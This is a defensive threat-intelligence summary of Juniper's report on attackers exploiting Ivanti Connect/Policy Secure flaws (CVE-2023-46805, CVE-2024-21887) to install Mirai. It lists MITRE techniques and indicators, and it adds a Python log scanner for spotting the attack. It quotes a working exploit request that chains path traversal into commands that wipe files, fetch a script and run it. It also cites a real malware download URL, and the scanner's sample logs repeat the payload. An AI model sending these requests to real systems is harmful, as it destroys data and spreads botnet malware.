Protecting Networks from Opportunistic Ivanti Pulse Secure Vulnerability Exploitation | Official Juniper Networks Blogs

Juniper Threat Labs reports opportunistic exploitation of Ivanti Pulse Secure authentication bypass and remote code execution vulnerabilities, leading to Mirai botnet payload delivery in the wild. The post analyzes the flaws, exploitation methods, observed payloads, and Juniper’s recommended mitigations, including patches, Juniper ATP Cloud protection, and IDP signatures. #IvantiPulseSecure #Mirai #CVE-2023-46805 #CVE-2024-21887 #IvantiConnectSecure #IvantiPolicySecure #JuniperThreatLabs

Key points

  • Exploitation attempts target Ivanti Pulse Secure vulnerabilities CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection).
  • CVE-2023-46805 affects Ivanti Connect Secure and Ivanti Policy Secure Gateways, enabling unauthorized access via the /api/v1/totp/user-backup-code endpoint with path traversal.
  • CVE-2024-21887 is a web component command injection that can be exploited over the internet to run arbitrary commands on the appliance.
  • Attackers combine auth bypass and path traversal to access sensitive resources and deploy payloads such as Mirai.
  • Mirai botnet payloads have been observed, including delivery via shell scripts and reverse shells (curl/Python-based).
  • Mitigations include applying Ivanti patches, Juniper ATP Cloud protection against Mirai and other malware, and IDP signatures at the network level.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of Ivanti Pulse Secure vulnerabilities enables remote access to restricted resources via vulnerable endpoints. ‘A security flaw, affecting both Ivanti ICS (Ivanti Connect Secure) and Ivanti Policy Secure, enables a remote attacker to gain unauthorized access to restricted resources by circumventing control checks.’
  • [T1059] Command and Scripting Interpreter – Attackers use crafted requests and shell commands (curl and Python-based reverse shells) to deploy payloads, including Mirai. ‘observed instances in the wild where attackers have exploited this vulnerability using both curl and Python-based reverse shells, enabling them to take control of vulnerable systems.’
  • [T1105] Ingress Tool Transfer – Attackers download a script from a remote server and execute it to deploy Mirai payloads. ‘downloads a file named “lol” from a specific URL (http://192[.]3[.]152[.]183/mips). After downloading, it gives the downloaded file permission to execute and runs it with the argument “0day_machine”.’
  • [T1203] Exploitation for Client Execution – The vulnerabilities enable remote code execution on the appliance, allowing attackers to run payloads like Mirai. ‘The encoded URL decodes to GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /; wget http:/…/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1’
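As an added, defender-side example that is not part of the Juniper post: a small access-log scanner that flags the two stages described above, traversal out of the totp user-backup-code endpoint into license/keys-status (CVE-2023-46805) and shell metacharacters in the resulting path segment (CVE-2024-21887). The log lines, TEST-NET addresses, regexes and function names are constructed for this illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample access-log lines (TEST-NET addresses, not observed traffic).
SAMPLE_LOGS = [
    '203.0.113.5 - - [12/Jan/2024:10:01:02 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/rm%20-rf%20*;%20cd%20/;%20wget%20http://203.0.113.9/wtf.sh;%20chmod%20777%20wtf.sh;%20./wtf.sh HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Jan/2024:10:01:03 +0000] "GET /api/v1/totp/user-backup-code/..%2f..%2flicense/keys-status/ HTTP/1.1" 403 88',
    '198.51.100.7 - - [12/Jan/2024:10:02:10 +0000] "POST /api/v1/totp/user-backup-code HTTP/1.1" 200 42',
    '198.51.100.7 - - [12/Jan/2024:10:02:11 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 1024',
]

# Combined-log-format request line: client IP, timestamp, method, raw path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"'
)
TOTP_ENDPOINT = "/api/v1/totp/user-backup-code"   # endpoint named in the post
KEYS_STATUS = "/api/v1/license/keys-status"       # traversal target named in the post
SHELL_META = re.compile(r"[;&|`$]")               # command-separator characters


def classify_path(raw_path):
    """Return a list of findings for one request path (empty when nothing matches)."""
    # Decode twice so %2e%2e, %2f and double-encoded variants collapse to literal '..'.
    decoded = unquote(unquote(raw_path))
    findings = []
    if decoded.startswith(TOTP_ENDPOINT + "/") and "/.." in decoded:
        findings.append("CVE-2023-46805: traversal out of the totp user-backup-code endpoint")
        # Resolve the '..' segments to see which resource the request really reaches.
        resolved = normpath(decoded)
        if resolved == KEYS_STATUS or resolved.startswith(KEYS_STATUS + "/"):
            tail = resolved[len(KEYS_STATUS):].lstrip("/")
            if SHELL_META.search(tail):
                findings.append("CVE-2024-21887: shell metacharacters in keys-status path segment")
    return findings


def scan_logs(lines):
    """Scan log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed request records
        findings = classify_path(m.group("path"))
        if findings:
            alerts.append({"ip": m.group("ip"), "path": m.group("path"), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(alert["ip"], alert["findings"])
```

The decoder deliberately normalizes before matching, so a signature that only looks for the literal string `../../license` on the raw path would miss the second sample line.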

Indicators of Compromise

  • [IP] context – 192.3.152.183 (C2/C2-like infrastructure)
  • [Hash] context – F20da76d75c7966abcbc050dde259a2c85b331c80cce0d113bc976734b78d61d, d6f5fc248e4c8fc7a86a8193eb970fe9503f2766951a3e4b8c084684e423e917
  • [URL] context – http://192.3.152.183/mips
  • [File name] context – lol, wtf.sh

Read more: https://blogs.juniper.net/en-us/security/protecting-your-network-from-opportunistic-ivanti-pulse-secure-vulnerability-exploitation